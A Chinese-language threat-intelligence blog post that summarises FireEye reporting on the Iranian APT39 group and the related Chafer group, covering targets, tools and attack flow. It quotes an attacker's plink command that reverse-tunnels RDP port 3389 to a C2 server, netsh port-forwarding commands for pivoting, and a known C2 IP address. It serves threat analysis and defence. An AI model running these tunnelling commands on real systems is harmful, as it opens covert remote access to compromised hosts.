<bdo id="2b3yk"><code id="2b3yk"></code></bdo>

  • <output id="2b3yk"><sup id="2b3yk"></sup></output>
    <output id="2b3yk"><ruby id="2b3yk"></ruby></output>
  • <code id="2b3yk"><delect id="2b3yk"></delect></code>

  • APT39:專注竊取個人信息的伊朗APT組織披露,以及其所使用的RDP隧道通信技術簡介

    火眼在今日匯總區分了一個名為APT39的伊朗APT組織。 其目的是為了將該組織和Chafer組織區分開(和朝鮮lazarus和APT38情況差不多)

    火眼在今日匯總區分了一個名為 APT39 的伊朗 APT 組織。

    其目的是為了將該組織和Chafer 組織區分開 (和朝鮮 lazarus 和 APT38 情況差不多)

    這個操作是不是似曾相似,沒錯,就是之前火眼命名的 APT38 組織,其為著名 APT 組織 Lazarus 的分支,專業針對金融行業進行攻擊。

    公眾號鏈接: APT38 組織:進行金融犯罪的朝鮮官方組織

    話說既然火眼已經不是第一次匯總 APT 組織名稱了,是不是我們也可以,嗯。

    具體信息

    組織名稱:APT39

    來源:伊朗國家隊

    目標:伊朗國內,其他中東國家或地區

    活動時間:自 2014 年 11 月以來,持續行動,

    活動目的:廣泛竊取伊朗公民個人信息,以支持為伊朗國家優先事項提供服務的監控、跟蹤或監視操作,或者可能創建額外的訪問和載體以促進未來的活動。 

    APT39 是為了匯集其背后成員此前的活動和使用的攻擊方法,其活動基本上與一個公開稱為「Chafer(金龜子)」的組織保持一致。

    為了不占前面排版,與 Chafer 的組織資料和 IOC 鏈接見文章最下面。順便扯一句,從這個組織過去的攻擊目標中,可以看到其針對多家中東航空公司進行了攻擊,其目的 90% 是為了更進一步的監控一些目標人物的活動軌跡和更多的信息。

    可以舉一反三一下。

    可能火眼是覺得該組織的公開報告的內容存在差異,下面為具體信息。

    APT39 主要利用SEAWEEDCACHEMONEY后門以及POWBAT特殊變種后門。

    雖然 APT39 的目標范圍是全球性的,但其活動主要集中在中東地區。

    APT39 優先考慮電信行業,并進一步瞄準旅游業和支持它的高科技行業的 IT 公司。

    APT39 所針對的國家和行業如下圖所示。

    涉及電信,高科技產業, 政府,商業服務,交通,媒體與娛樂

    圖 APT39 所針對的國家和行業

    APT39 對電信和旅游行業的關注表明,其意圖針對特定個人進行監控,跟蹤或監視操作,收集專有或客戶數據用于商業或運營目的,以滿足與國家優先事項相關的戰略要求。

    伊朗政府明確表明了其收集可能有利于民族國家決策的地緣政治數據的潛在意圖

    因此 APT39 的主要任務是跟蹤或監控感興趣的目標,收集個人信息(包括旅行路線)以及從電信公司收集客戶數據

    雖然 APT39 和 APT34(OilRig) 有一些相似之處,包括惡意軟件分發方法,POWBAT 后門使用,基礎設施命名和目標重疊,但火眼認為 APT39 與 APT34 不同,因為它使用了不同的 POWBAT 變體。

    同樣,這些組織和朝鮮類似在某種程度上會進行協同工作或共享資源。

    此外,APT39 會使用各種自定義和公開可用的惡意軟件和工具進行攻擊。

    攻擊流程如下:

    首先,APT39 會利用帶有惡意附件 (和/或) 超鏈接的釣魚電子郵件, 通常會 drop POWBAT 對目標主機進行感染。并且 APT39 會經常注冊并利用偽裝成合法 Web 服務的域名和與預期目標相關的組織的相關域名。

    此外,該小組還定期識別并利用目標組織的存在漏洞的 Web 服務器來安裝 Web shell,例如 ANTAK 和 ASPXSPY,并使用被盜的合法憑據來破壞面向外部的 Outlook Web Access(OWA)資源,從而建立立足點,提權并內網滲透。

    在得到權限后,APT39 會利用 SEAWEED,CACHEMONEY 等定制后門以及 POWBAT 的獨特變體來在目標環境中建立立足點。

    在提權期間,除了 Windows Credential Editor 和 ProcDump 等合法工具外,還可以觀察到其使用免費提供的工具,如 Mimikatz 和 Ncrack。

    內網滲透期間則會使用自定義腳本和免費提供的自定義工具(如端口掃描程序,BLUETORCH)進行橫向移動。

    APT39 通過遠程桌面協議(RDP),SSH,PsExec,RemCom 和 xCmdSvc 等無數工具促進橫向移動。

    REDTRIP,PINKTRIP 和 BLUETRIP 等自定義工具也被用于在受感染主機之間創建 SOCKS5 代理。

    除了使用 RDP 進行橫向移動外,APT39 還使用此協議來維護受害環境中的持久性。為了完成其使命,APT39 通常使用 WinRAR 或 7-Zip 等壓縮工具壓縮被盜數據并進行回傳。

    下圖為具體匯總信息。

    值得一提的是,APT39 會重新打包 Mimikatz 從而繞過目標機器上的殺軟檢測。

    APT39 對電信和旅游行業的重要目標反映了其努力為了監控目標而收集關于目標和客戶數據的個人信息,以便于未來更好的進行監視工作。

    電信公司是有吸引力的目標,因為它們存儲大量的個人和客戶信息,提供對用于通信的關鍵基礎設施的訪問,并允許跨多個垂直行業訪問各種潛在目標。

    APT39 的目標不僅代表了其對已知目標行業的威脅,而且還延伸到這些組織的客戶群,其中包括全球范圍內的各種行業和個人。

    以上相關鏈接:

    https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

    可能是 chafer 之前都是針對航空公司,然后 APT39 主要是針對電信和旅游行業?因此新增一個名稱?(大概)           

    而 APT39 這個名稱不是第一次被火眼公開談論過了,前幾天火眼發出的報告<<通過 RDP 隧道繞過網絡限制>>中,

    火眼安全研究員 Steve 大兄弟 (@stvemillertime) 基于這個報告表示有多個組織使用了這個技術, 使用 Plink 進行 RDP 隧道建立通信。

    分別為

    APT34, APT35, APT39, FIN1, FIN6, FIN7, FIN8 和 triton 背后的組織

    針對工控系統的 TRITON 入侵活動由俄羅斯研究所支持】            

    這個 RDP 隧道 (RDP, Remote Desktop Protocol) 一文具體如下

    用于隧道 RDP 會話的常用實用程序是 PuTTY Link,通常稱為 Plink。

    Plink 可用于使用任意源和目標端口與其他系統建立安全 shell(SSH)網絡連接。

    由于許多 IT 環境要么不執行協議檢查,要么不阻止從其網絡出站的 SSH 通信,因此 FIN8 等攻擊者使用 Plink 創建加密隧道,會被允許通過受感染系統上的 RDP 端口與攻擊者命令和控制進行通信(C2)服務器。

    示例如下:

        plink.exe <users>@<IP or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

    使用 Plink 創建 RDP 隧道成功和從攻擊者 C2 服務器到受害者的成功端口轉發示例圖。           

    還可以通過端口轉發進行 RDP 隧道連接

    示例如下:

    示例 netsh 端口轉發命令:

        netsh interface portproxy add v4tov4 listenport = 8001 listenaddress = <JUMP BOX IP> connectport = 3389 connectaddress = <DESTINATION IP>

    示例縮短的 netsh 端口轉發命令:

        netsh I pavl = 8001 listena = <JUMP BOX IP> connectp = 3389 c = <DESTINATION IP>

    使用跳板通過 RDP 進行橫向移動到其他網段

    RDP 協議握手情況

    原文還談及了如何基于網絡和主機進行檢測,有興趣的可以看原文閱讀一番。

    相關鏈接:

    https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

    此前火眼另一篇文章也提到過這類技術

    <<建立遠程桌面協議的基準>>

    下面這幅圖就非常不錯,涉及點和面很廣,翻譯一下又是一頁 PPT。

    原文還對如何通過事件日志追蹤 RDP 連接進行了講解,感興趣可以詳細看一下。

    相關鏈接

    https://www.fireeye.com/blog/threat-research/2018/04/establishing-a-baseline-for-remote-desktop-protocol.html

    資料如下:

    Chafer:

    這是我之前匯總的

    伊朗 Cadelle 和 Chafer 組織具有關聯性,他們一直在利用后門對國內和國際目標進行有針對性的監視。

    雖然這些組織主要針對位于伊朗的個人,但他們也對中東地區的航空公司和電信提供商進行攻擊,可能是為了監控目標的移動和通信。

     OilRig APT 組織使用的 C&C 服務器 IP 地址 83.142.230.138 與 Chafer 黑客組織使用的是一樣的。同樣具有關聯性。

    伊朗 APT 組織 Chafer 在 2017 年的攻擊事件介紹

    Chafer 是一個在 2015 年被賽門鐵克曝光的伊朗 APT 組織,該組織在 2017 年仍然保持活躍:攻擊了中東地區 9 個新的目標組織(以色列,約旦,阿拉伯聯合酋長國,沙特阿拉伯和土耳其的組織)。

    Chafer 襲擊的目標行業主要為航空公司,飛機服務,IT 服務,軟件,通訊服務,工資服務,工程建設。

    該組織在最新的工具包中增加了一批惡意 Excel 宏文檔,該文檔打開后首先會運行 Powershell 腳本下載三個文件,這三個文件分別為竊密程序,截屏程序和一個空的可執行程序。

    其中竊密程序能夠竊取剪貼板的內容,截取屏幕截圖,記錄鍵盤記錄以及竊取文件和用戶憑證。在此之后,Powershell 腳本會陸陸續續下載新的惡意程序。

    以下為 2017 年該組織涉及到的 7 種新工具:

    Remcom:PsExec 的開源替代品,它是用于在其他系統上執行進程的 Microsoft Sysinternals 工具。

    NSSM:Windows 服務管理器的開源替代品,可用于安裝和刪除服務,并在服務崩潰時重新啟動服務。

    自定義屏幕截圖和剪貼板捕獲工具。

    SMB 黑客工具:與其他工具一起使用來遍歷目標網絡。這些工具包括 EternalBlue 漏洞(之前由 WannaCry 和 Petya 使用)。

    GNU HTTPTunnel:一種可在 Linux 計算機上創建雙向 HTTP 隧道的開源工具,可能允許超出限制性防火墻的通信。

    UltraVNC:用于 Microsoft Windows 的開源遠程管理工具。

    NBTScan:用于掃描 IP 網絡以獲取 NetBIOS 名稱信息的免費工具。

    Chafer 還繼續使用之前與該組織相關的工具,包括自己定制的后門 Remexi,PsExec,Mimikatz,Pwdump 和 PuTTY。

    Chafer 已經使用這些工具來遍歷目標網絡。該組織最近采用了 NSSM 來維護持久性,并在受感染計算機上安裝運行 Plink 服務。然后使用 Plink 從攻擊者的服務器向受害者計算機上的 RDP 端口打開反向 SSH 會話。因此可以使用 RDP 訪問受感染的計算機。

    一旦建立了立足點,攻擊者就可以使用 PsExec,Remcom 和 SMB 黑客工具開始內網滲透。

    [1]https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

    [2]https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

    [3]https://securityaffairs.co/wordpress/55145/apt/oilrig-apt-itan.html

    發表評論

    已有 1 條評論

    取消
    Loading...
    css.php 宁夏卫视在线直播观看